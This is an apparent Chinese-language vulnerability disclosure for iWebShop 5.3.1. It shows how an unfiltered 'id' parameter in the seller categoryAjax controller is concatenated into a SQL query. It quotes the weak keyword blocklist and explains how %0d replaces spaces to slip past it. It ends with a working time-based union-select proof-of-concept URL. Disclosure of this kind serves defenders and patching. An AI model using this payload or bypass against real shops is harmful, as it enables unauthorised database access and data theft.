iwebshop 最新版本5.3.1 前台注入
iwebshop最新版存在一个非常弱智的注入漏洞
主要导致原因 $id = IFilter::act(IReq::get('id'));
开发者忘记写成 IFilter::act(IReq::get('id'), 'int')
了,导致直接注入. 在其他文件也存在这个问题.
这个文件需要商家账号才可以访问,是可以注册的
漏洞点 controllers/seller.php
函数categoryAjax
1
2
3
4
5
6
7
8
9
10
11
12
| public function categoryAjax()
{
$id = IFilter::act(IReq::get('id'));
$parent_id = IFilter::act(IReq::get('parent_id'));
if($id && is_array($id))
{
foreach($id as $category_id)
{
$childString = goods_class::catChild($category_id);//父类ID不能死循环设置成其子分类
if($parent_id > 0 && stripos(",".$childString.",",",".$parent_id.",") !== false)
{ die(JSON::encode(array('result' => 'fail'))); }
}
|
直接将id传入到catChild
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| public static function catChild($catId,$level = 1)
{ if($level == 0) {
return $catId;
}
$temp = array();
$result = array($catId); $catDB = new IModel('category');
while(true)
{
$id = current($result);
if(!$id)
{
break;
}
$temp = $catDB->query('parent_id = '.$id);
|
直接将id拼接到sql查询中.. 这个cms有一点sql过滤,但是非常弱,也就ctf入门题的水平
lib/core/util/filter_class.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| public static function string($str,$limitLen = false)
{
$str = trim($str);
$str = self::limitLen($str,$limitLen);
$str = htmlspecialchars($str,ENT_NOQUOTES);
return self::addSlash($str);
}
public static function word($str)
{
$word = array("select ","select/*","update ","update/*","delete ","delete/*","insert into","insert/*","updatexml","concat","()","/**/","union(");
foreach($word as $val)
{
if(stripos($str,$val) !== false)
{
return '';
}
}
return self::removeEmoji($str);
}
|
不允许union
加空格,可是空格的代替很多 比如 %0d
poc
1
| /index.php?controller=seller&action=categoryAjax&id[]=1%20and%201=1%20union%0dselect%0d1,2,3,4,5,6,7,8,sleep(5)
|